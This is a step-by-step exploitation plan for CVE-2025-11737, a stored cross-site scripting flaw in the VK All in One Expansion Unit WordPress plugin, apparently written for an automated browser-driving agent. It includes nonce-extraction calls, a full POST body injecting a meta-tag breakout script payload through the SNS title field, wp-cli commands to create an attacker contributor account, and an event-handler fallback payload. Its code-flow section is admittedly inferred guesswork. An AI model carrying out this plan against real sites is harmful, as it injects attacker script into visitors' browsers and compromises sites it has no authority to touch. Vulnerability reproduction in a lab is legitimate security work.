VK All in One Expansion Unit <= 9.112.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via SNS Title

This research plan outlines the steps to exploit CVE-2025-11737, a Stored Cross-Site Scripting (XSS) vulnerability in the VK All in One Expansion Unit plugin for WordPress.

---

1. Vulnerability Summary

• Vulnerability: Stored Cross-Site Scripting (XSS) via the vkExUnit_sns_title parameter.
• Affected Versions: <= 9.112.3.
• Vulnerable Component: The "SNS" (Social Networking Service) settings module, specifically the portion that allows users to override the title for Open Graph (OG) or Twitter Cards on a per-post basis.
• Root Cause: The plugin fails to adequately sanitize the vkExUnit_sns_title input when saving post meta and fails to escape the value when outputting it in the <head> section of the page (usually within meta tags like og:title or twitter:title).
• Required Privileges: Contributor or higher (users with the edit_posts capability).

2. Attack Vector Analysis

• Endpoint: /wp-admin/post.php (for existing posts) or /wp-admin/post-new.php (for new posts).
• Action: editpost (standard WordPress post update).
• Parameter: vkExUnit_sns_title.
• Preconditions: The "SNS" module must be active within the VK All in One Expansion Unit settings.
• Persistence: The payload is stored in the wp_postmeta table and persists until the post is deleted or the meta value is manually updated.

3. Code Flow (Inferred)

1. Input: An authenticated Contributor submits a post edit form. The POST request includes vkExUnit_sns_title=<script>alert(1)</script>.
2. Storage: The plugin registers a hook (likely save_post) that processes fields from the VK ExUnit meta box.
   • Function: Likely within a class handling post meta, e.g., VkExUnit_Sns_Admin::save_post_meta.
   • Logic: update_post_meta($post_id, 'vkExUnit_sns_title', $_POST['vkExUnit_sns_title']) is called without sanitize_text_field.
3. Output: When a user (admin or public) views the post.
   • Hook: add_action('wp_head', ...) or a similar hook used for SEO/SNS meta tags.
   • Function: Likely VkExUnit_Sns_Public::output_ogp or similar.
   • Logic: The value of vkExUnit_sns_title is retrieved using get_post_meta.
   • Sink: The value is echoed directly into a <meta> tag attribute or content without esc_attr or esc_html.

4. Nonce Acquisition Strategy

Since this exploit leverages the standard WordPress post-editing flow, the primary nonces required are those generated by WordPress core for post editing.

1. Identify Shortcode/Trigger: The SNS meta box appears on the standard Post/Page editor. No specific shortcode is needed to trigger the vulnerability, but the plugin must be active.
2. Create/Edit Post:
   • Navigate to /wp-admin/post-new.php.
   • Extract the _wpnonce from the form (action: add-post).
   • Extract the _wp_http_referer.
3. JavaScript Extraction:
   The execution agent should use browser_navigate to the post editor and then:
   • browser_eval("document.querySelector('#_wpnonce').value") to get the core WordPress nonce.
   • Check for plugin-specific nonces in the VK ExUnit meta box if check_admin_referer is used by the plugin (e.g., browser_eval("document.querySelector('#vkExUnit_sns_nonce')?.value")).

5. Exploitation Strategy

Step 1: Setup
Create a Contributor-level user and ensure the plugin is active.

Step 2: Payload Injection
Submit a POST request to /wp-admin/post.php to save the malicious SNS title.

• URL: http://localhost:8080/wp-admin/post.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Payload (Body):

  action=editpost
  &post_ID=[POST_ID]
  &_wpnonce=[NONCE]
  &_wp_http_referer=/wp-admin/post.php?post=[POST_ID]&action=edit
  &post_title=XSS Test
  &vkExUnit_sns_title="><script>alert(document.domain)</script>
  &vkExUnit_sns_description=TestDescription
  

  Note: The payload "><script>... is designed to break out of the content attribute of a <meta> tag.

Step 3: Verification (Frontend)
Navigate to the frontend URL of the post created/edited.

6. Test Data Setup

1. Plugin Status: Ensure vk-all-in-one-expansion-unit is installed and activated.
2. User: Create a contributor:
   wp user create attacker attacker@example.com --role=contributor --user_pass=password123
3. Post: Create an initial post for the contributor to edit:
   wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID) --post_title="Target Post"

7. Expected Results

• The POST request should return a 302 Redirect back to the post editor.
• When viewing the frontend of the post or the "Preview," the HTML source should contain:
  <meta property="og:title" content=""><script>alert(document.domain)</script>"> (or similar depending on the specific meta tag used).
• A browser alert box should appear showing the site domain.

8. Verification Steps (Post-Exploit)

Confirm the metadata is stored in the database:
wp post meta get [POST_ID] vkExUnit_sns_title
Expected output: "><script>alert(document.domain)</script>

9. Alternative Approaches

• Meta Box Check: If the plugin uses a different meta key (e.g., a serialized array), use wp post meta list [POST_ID] to find the exact key used by VK ExUnit.
• Attribute Breakout: If the payload is rendered inside an attribute but the plugin performs basic escaping of >, try a payload that uses event handlers:
  vkExUnit_sns_title='onmouseover=alert(1) style=position:fixed;top:0;left:0;width:100%;height:100%;' (if injected into a tag that supports event handlers).
• Twitter Card Sink: Check if the payload reflects in twitter:title or twitter:description if og:title is sanitized but others are not.